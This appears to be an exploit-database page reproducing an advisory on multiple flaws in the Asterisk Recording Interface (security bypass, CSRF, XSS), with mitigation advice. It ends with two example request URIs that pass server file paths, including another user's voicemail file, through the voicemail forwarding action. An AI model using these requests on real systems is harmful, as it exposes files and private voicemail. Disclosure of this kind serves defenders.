header-logo
Suggest Exploit
vendor:
Asterisk Recording Interface
by:
7.5
CVSS
HIGH
Security Bypass, Cross-Site Request Forgery, Cross-Site Scripting
287, 352, 79
CWE
Product Name: Asterisk Recording Interface
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Asterisk Recording Interface Multiple Vulnerabilities

Attackers can exploit these vulnerabilities to steal authentication credentials, gain unauthorized access, bypass security restrictions, disclose sensitive information, or cause denial-of-service conditions.

Mitigation:

Apply the latest patches and updates from the vendor. Implement proper input validation and output encoding to prevent XSS attacks. Implement CSRF protection mechanisms.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/41571/info

The Asterisk Recording Interface is prone to the following issues:

1. Multiple security bypass vulnerabilities.
2. A cross-site request-forgery vulnerability.
3. A cross-site scripting vulnerability.

Attackers can exploit these issues to steal cookie-based authentication credentials, gain unauthorized access to the application, bypass certain security restrictions, disclose sensitive information, or cause denial-of-service conditions. 

The following example URIs are available:

http://www.example.com/recordings/index.php?m=Voicemail&f=msgAction&a=forward_to&q=&folder=&start=0&span=15&order=calldate&sort=desc&folder_rx=&mailbox_rx=houston%2F2627&selected7=/var/www/recordings/index.php

http://www.example.com/recordings/index.php?m=Voicemail&f=msgAction&a=forward_to&q=&folder=INBOX&start=0&span=15&order=calldate&sort=desc&folder_rx=&mailbox_rx=houston%2F4949&selected7=%2Fvar%2Fspool%2Fasterisk%2Fvoicemail%2Fhouston%2F2625%2FINBOX%2Fmsg0000.txt